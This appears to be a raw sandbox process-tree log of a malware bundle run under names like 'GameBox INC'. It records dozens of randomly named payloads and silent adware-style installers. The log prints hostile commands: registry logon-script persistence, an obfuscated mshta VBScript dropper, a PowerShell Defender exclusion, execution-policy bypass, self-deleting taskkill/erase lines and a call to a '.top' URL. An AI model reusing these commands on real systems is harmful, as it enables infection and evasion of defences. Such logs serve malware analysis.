C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f10⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7219⤵
-
-
C:\Users\Admin\AppData\Local\Temp\is-EFADH.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-EFADH.tmp\{app}\vdi_compiler"9⤵
-
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"9⤵
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\1923433.exe"C:\Users\Admin\AppData\Roaming\1923433.exe"6⤵
-
-
C:\Users\Admin\AppData\Roaming\1172959.exe"C:\Users\Admin\AppData\Roaming\1172959.exe"6⤵
-
-
C:\Users\Admin\AppData\Roaming\7332550.exe"C:\Users\Admin\AppData\Roaming\7332550.exe"6⤵
-
-
C:\Users\Admin\AppData\Roaming\5299530.exe"C:\Users\Admin\AppData\Roaming\5299530.exe"6⤵
-
-
C:\Users\Admin\AppData\Roaming\8588681.exe"C:\Users\Admin\AppData\Roaming\8588681.exe"6⤵
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-P67PA.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-P67PA.tmp\MediaBurner2.tmp" /SL5="$3021C,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-2K4S6.tmp\ultradumnibour.exe"C:\Users\Admin\AppData\Local\Temp\is-2K4S6.tmp\ultradumnibour.exe" /S /UID=burnerch27⤵
-
C:\Users\Admin\AppData\Local\Temp\MLTECAQMEF\ultramediaburner.exe"C:\Users\Admin\AppData\Local\Temp\MLTECAQMEF\ultramediaburner.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-08E18.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-08E18.tmp\ultramediaburner.tmp" /SL5="$40288,281924,62464,C:\Users\Admin\AppData\Local\Temp\MLTECAQMEF\ultramediaburner.exe" /VERYSILENT9⤵
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\20-47fc2-ee0-18eac-e0f5f33573f4a\ZHahaedututu.exe"C:\Users\Admin\AppData\Local\Temp\20-47fc2-ee0-18eac-e0f5f33573f4a\ZHahaedututu.exe"8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h1nsa0q3.4pt\GcleanerEU.exe /eufive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\h1nsa0q3.4pt\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\h1nsa0q3.4pt\GcleanerEU.exe /eufive10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\h1nsa0q3.4pt\GcleanerEU.exe" & exit11⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f12⤵
- Kills process with taskkill
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hefy33gh.kio\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\hefy33gh.kio\installer.exeC:\Users\Admin\AppData\Local\Temp\hefy33gh.kio\installer.exe /qn CAMPAIGN="654"10⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gsin4ghu.2ny\anyname.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\gsin4ghu.2ny\anyname.exeC:\Users\Admin\AppData\Local\Temp\gsin4ghu.2ny\anyname.exe10⤵
-
C:\Users\Admin\AppData\Local\Temp\gsin4ghu.2ny\anyname.exe"C:\Users\Admin\AppData\Local\Temp\gsin4ghu.2ny\anyname.exe" -q11⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yxcinvfl.h01\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\yxcinvfl.h01\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\yxcinvfl.h01\gcleaner.exe /mixfive10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\yxcinvfl.h01\gcleaner.exe" & exit11⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f12⤵
- Kills process with taskkill
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sskvyxea.3o2\autosubplayer.exe /S & exit9⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\21-b5e13-aa8-63084-85d37fad73edc\Naboxosuti.exe"C:\Users\Admin\AppData\Local\Temp\21-b5e13-aa8-63084-85d37fad73edc\Naboxosuti.exe"8⤵
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"5⤵
-
C:\Users\Admin\Documents\7gZdxXz2EY6nwbbE_5i1dB1P.exe"C:\Users\Admin\Documents\7gZdxXz2EY6nwbbE_5i1dB1P.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5704 -s 3887⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5704 -s 4007⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5704 -s 6287⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5704 -s 6167⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5704 -s 6967⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5704 -s 7247⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5704 -s 6727⤵
- Program crash
-
-
C:\Users\Admin\Documents\7gZdxXz2EY6nwbbE_5i1dB1P.exe"C:\Users\Admin\Documents\7gZdxXz2EY6nwbbE_5i1dB1P.exe"7⤵
-
-
-
C:\Users\Admin\Documents\WtoywCLDqMtklnJ44nH8yLtG.exe"C:\Users\Admin\Documents\WtoywCLDqMtklnJ44nH8yLtG.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "WtoywCLDqMtklnJ44nH8yLtG.exe" /f & erase "C:\Users\Admin\Documents\WtoywCLDqMtklnJ44nH8yLtG.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "WtoywCLDqMtklnJ44nH8yLtG.exe" /f8⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Documents\YZ5BBzN8_aFmQDY5t70go5jn.exe"C:\Users\Admin\Documents\YZ5BBzN8_aFmQDY5t70go5jn.exe"6⤵
-
-
C:\Users\Admin\Documents\YlaWcg1hWuhlEDcVMDv5LOTj.exe"C:\Users\Admin\Documents\YlaWcg1hWuhlEDcVMDv5LOTj.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\YlaWcg1hWuhlEDcVMDv5LOTj.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\YlaWcg1hWuhlEDcVMDv5LOTj.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\YlaWcg1hWuhlEDcVMDv5LOTj.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\YlaWcg1hWuhlEDcVMDv5LOTj.exe" ) do taskkill -IM "%~nXW" -f8⤵
-
C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXeWO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu99⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f11⤵
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE10⤵
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "YlaWcg1hWuhlEDcVMDv5LOTj.exe" -f9⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Documents\mWKYZrx90wFHq1Z671h4JNCC.exe"C:\Users\Admin\Documents\mWKYZrx90wFHq1Z671h4JNCC.exe"6⤵
-
-
C:\Users\Admin\Documents\XrTE9cV7nH1QtwX0N3aATBWw.exe"C:\Users\Admin\Documents\XrTE9cV7nH1QtwX0N3aATBWw.exe"6⤵
-
-
C:\Users\Admin\Documents\yD4IXBxAMtf1hN4OuOLZCdVQ.exe"C:\Users\Admin\Documents\yD4IXBxAMtf1hN4OuOLZCdVQ.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 9247⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 10927⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 13487⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 13207⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 14527⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\R4UgJGhLPQA5udiufMlOVGmW.exe"C:\Users\Admin\Documents\R4UgJGhLPQA5udiufMlOVGmW.exe"6⤵
-
C:\Users\Admin\Documents\R4UgJGhLPQA5udiufMlOVGmW.exeC:\Users\Admin\Documents\R4UgJGhLPQA5udiufMlOVGmW.exe7⤵
-
-
-
C:\Users\Admin\Documents\V3S59iEgpCcqTfgyUPM2dL05.exe"C:\Users\Admin\Documents\V3S59iEgpCcqTfgyUPM2dL05.exe"6⤵
-
C:\Users\Admin\Documents\V3S59iEgpCcqTfgyUPM2dL05.exe"C:\Users\Admin\Documents\V3S59iEgpCcqTfgyUPM2dL05.exe"7⤵
-
-
-
C:\Users\Admin\Documents\NQQB7xxBHabL8yOj9tI21zBr.exe"C:\Users\Admin\Documents\NQQB7xxBHabL8yOj9tI21zBr.exe"6⤵
-
-
C:\Users\Admin\Documents\iA9OtSe_I8nipp6kjWimpSzv.exe"C:\Users\Admin\Documents\iA9OtSe_I8nipp6kjWimpSzv.exe"6⤵
-
C:\Users\Admin\Documents\iA9OtSe_I8nipp6kjWimpSzv.exeC:\Users\Admin\Documents\iA9OtSe_I8nipp6kjWimpSzv.exe7⤵
-
-
-
C:\Users\Admin\Documents\Tm0rmIsB_MM3eHf64jaRfX39.exe"C:\Users\Admin\Documents\Tm0rmIsB_MM3eHf64jaRfX39.exe"6⤵
-
-
C:\Users\Admin\Documents\nwJeYv1TLSQcjLEv9OBZ5iQl.exe"C:\Users\Admin\Documents\nwJeYv1TLSQcjLEv9OBZ5iQl.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6896 -s 6607⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6896 -s 6807⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6896 -s 6647⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6896 -s 10887⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\OFS8HtqU18wgXBqRQGrXxIrf.exe"C:\Users\Admin\Documents\OFS8HtqU18wgXBqRQGrXxIrf.exe"6⤵
-
-
C:\Users\Admin\Documents\ANXr0mKNMmQyhygMGmnGD0e6.exe"C:\Users\Admin\Documents\ANXr0mKNMmQyhygMGmnGD0e6.exe"6⤵
-
-
C:\Users\Admin\Documents\X3AUkO1gbf_qB5LJge0yUZWi.exe"C:\Users\Admin\Documents\X3AUkO1gbf_qB5LJge0yUZWi.exe"6⤵
-
-
C:\Users\Admin\Documents\FSh5tIMk_uAxXBPwBfwMot8_.exe"C:\Users\Admin\Documents\FSh5tIMk_uAxXBPwBfwMot8_.exe"6⤵
-
-
C:\Users\Admin\Documents\YMOksOCAcPtHP5CCTNKWFnFr.exe"C:\Users\Admin\Documents\YMOksOCAcPtHP5CCTNKWFnFr.exe"6⤵
-
C:\Users\Admin\Documents\YMOksOCAcPtHP5CCTNKWFnFr.exe"C:\Users\Admin\Documents\YMOksOCAcPtHP5CCTNKWFnFr.exe"7⤵
-
-
-
C:\Users\Admin\Documents\GJ8Qva_kkhFgk1oh8h26h27_.exe"C:\Users\Admin\Documents\GJ8Qva_kkhFgk1oh8h26h27_.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\4812548.exe"C:\Users\Admin\AppData\Roaming\4812548.exe"7⤵
-
-
C:\Users\Admin\AppData\Roaming\8633772.exe"C:\Users\Admin\AppData\Roaming\8633772.exe"7⤵
-
-
C:\Users\Admin\AppData\Roaming\2613960.exe"C:\Users\Admin\AppData\Roaming\2613960.exe"7⤵
-
-
C:\Users\Admin\AppData\Roaming\7019463.exe"C:\Users\Admin\AppData\Roaming\7019463.exe"7⤵
-
-
-
C:\Users\Admin\Documents\SsRnAytDM_cH93fje9oR5fU_.exe"C:\Users\Admin\Documents\SsRnAytDM_cH93fje9oR5fU_.exe"6⤵
-
-
C:\Users\Admin\Documents\ueVnzvM63pBb0IIDSprp38fx.exe"C:\Users\Admin\Documents\ueVnzvM63pBb0IIDSprp38fx.exe"6⤵
-
-
C:\Users\Admin\Documents\5soVFYCqg80gL1p9WSFoER4S.exe"C:\Users\Admin\Documents\5soVFYCqg80gL1p9WSFoER4S.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "5soVFYCqg80gL1p9WSFoER4S.exe" /f & erase "C:\Users\Admin\Documents\5soVFYCqg80gL1p9WSFoER4S.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "5soVFYCqg80gL1p9WSFoER4S.exe" /f8⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Documents\VzAeFyMMAxHCci2Lhh9Gukon.exe"C:\Users\Admin\Documents\VzAeFyMMAxHCci2Lhh9Gukon.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-Q1UBQ.tmp\VzAeFyMMAxHCci2Lhh9Gukon.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q1UBQ.tmp\VzAeFyMMAxHCci2Lhh9Gukon.tmp" /SL5="$4049E,138429,56832,C:\Users\Admin\Documents\VzAeFyMMAxHCci2Lhh9Gukon.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-10OEU.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-10OEU.tmp\Setup.exe" /Verysilent8⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"9⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579453 /qn CAMPAIGN=""710"" " CAMPAIGN="710"10⤵
-
-
-
-
-
-
C:\Users\Admin\Documents\rsmgJCA83vaoAxMyBpz7OtbD.exe"C:\Users\Admin\Documents\rsmgJCA83vaoAxMyBpz7OtbD.exe"6⤵
-
C:\Users\Admin\Documents\rsmgJCA83vaoAxMyBpz7OtbD.exe"C:\Users\Admin\Documents\rsmgJCA83vaoAxMyBpz7OtbD.exe" -q7⤵
-
-
-
C:\Users\Admin\Documents\gcupVswiZM2SWqMBovuBKCN1.exe"C:\Users\Admin\Documents\gcupVswiZM2SWqMBovuBKCN1.exe"6⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\GCUPVS~1.DLL,s C:\Users\Admin\DOCUME~1\GCUPVS~1.EXE7⤵
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\GCUPVS~1.DLL,SkUFNw==8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\GCUPVS~1.DLL9⤵
-
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\GCUPVS~1.DLL,Wz0d9⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 3180410⤵
-
C:\Windows\system32\ctfmon.exectfmon.exe11⤵
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpBDB.tmp.ps1"9⤵
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"5⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q6⤵
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent5⤵
-
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent5⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-221JA.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-221JA.tmp\VPN.tmp" /SL5="$10374,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-VKUB5.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-VKUB5.tmp\Setup.exe" /silent /subid=7202⤵
-
C:\Users\Admin\AppData\Local\Temp\is-OK435.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-OK435.tmp\Setup.tmp" /SL5="$30314,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-VKUB5.tmp\Setup.exe" /silent /subid=7203⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "4⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09015⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "4⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09015⤵
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall4⤵
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install4⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-7OCSM.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-7OCSM.tmp\WEATHER Manager.tmp" /SL5="$10362,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-PG99H.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PG99H.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7152⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-PG99H.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-PG99H.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579453 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"3⤵
-
-
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵
-
C:\ProgramData\rnvnrm\xkekicj.exeC:\ProgramData\rnvnrm\xkekicj.exe start1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0ED81207733C6ECA7FB4BDD19DF5B9AC C2⤵
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 21F4A264BA7CC57AB118B5FC77D29FA92⤵
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2EA1501D0A4D785599154B035009A41E C2⤵
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding EA6D82AC7233B519BACAA1FEF06EDD3A C2⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1f4,0x1f8,0x1fc,0x1d0,0x200,0x7ff96400dec0,0x7ff96400ded0,0x7ff96400dee05⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff7fb119e70,0x7ff7fb119e80,0x7ff7fb119e906⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1828,1518887179799764213,4970876469676260911,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6012_347234889" --mojo-platform-channel-handle=1904 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1828,1518887179799764213,4970876469676260911,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6012_347234889" --mojo-platform-channel-handle=1892 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1828,1518887179799764213,4970876469676260911,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6012_347234889" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1844 /prefetch:25⤵
-
-
